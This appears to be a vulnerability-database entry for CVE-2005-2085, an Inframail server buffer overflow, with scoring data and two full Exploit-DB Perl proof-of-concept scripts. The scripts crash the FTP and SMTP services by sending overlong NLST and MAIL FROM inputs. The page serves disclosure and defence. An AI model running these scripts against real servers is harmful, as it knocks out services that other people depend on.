CVE-2005-2085
published 2005-07-05CVE-2005-2085: Buffer overflow in Inframail Advantage Server Edition 6.0 through 6.7 allows remote attackers to cause a denial of service (process crash) via a long (1) SMTP…
PriorityP421medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
2.63%
83.6th percentile
Buffer overflow in Inframail Advantage Server Edition 6.0 through 6.7 allows remote attackers to cause a denial of service (process crash) via a long (1) SMTP FROM field or possibly (2) FTP NLST command.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| infradig_systems | inframail_advantage | — | — |
| infradig_systems | inframail_advantage | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Inframail Advantage Server Edition 6.0 < 6.37 - 'FTP' Buffer Overflow
exploitdb·2005-06-27
CVE-2005-2085 Inframail Advantage Server Edition 6.0 < 6.37 - 'FTP' Buffer Overflow
Inframail Advantage Server Edition 6.0
# Inframail_FTPOverflow.pl 127.0.0.1
#
# Infradig Systems Inframail Advantage Server Edition 6.0
# (Version: 6.37)
#
# Download:
# http://www.infradig.com/
#
#########################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "21",
Proto => "TCP"))
{
print "Attempting to kill Inframail FTP server at $ARGV[0]:21...";
sleep(1);
print $socket "USER hello\r\n";
sleep(1);
print $socket "PASS moto\r\n";
sleep(1);
print $socket "NLST " . "A" x 102400 . "\r\n";
sleep(1);
print $socket "NLST " . "A" x 102400 . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:21\n";
}
#===== End Inframail_FTPOverflow.pl =====
# milw0rm.com [20
Exploit-DB
Inframail Advantage Server Edition 6.0 < 6.37 - 'SMTP' Buffer Overflow
exploitdb·2005-06-27
CVE-2005-2085 Inframail Advantage Server Edition 6.0 < 6.37 - 'SMTP' Buffer Overflow
Inframail Advantage Server Edition 6.0
# Inframail_SMTPOverflow.pl 127.0.0.1
#
# Infradig Systems Inframail Advantage Server Edition 6.0
# (Version: 6.37)
#
# Download:
# http://www.infradig.com/
#
#########################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "25",
Proto => "TCP"))
{
print "Attempting to kill Inframail SMTP server at $ARGV[0]:25...";
sleep(1);
print $socket "HELO moto.com\r\n";
sleep(1);
print $socket "MAIL FROM:" . "A" x 40960 . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:25\n";
}
#===== End Inframail_SMTPOverflow.pl =====
# milw0rm.com [2005-06-27]
No writeups or analysis indexed.
2005-07-05
Published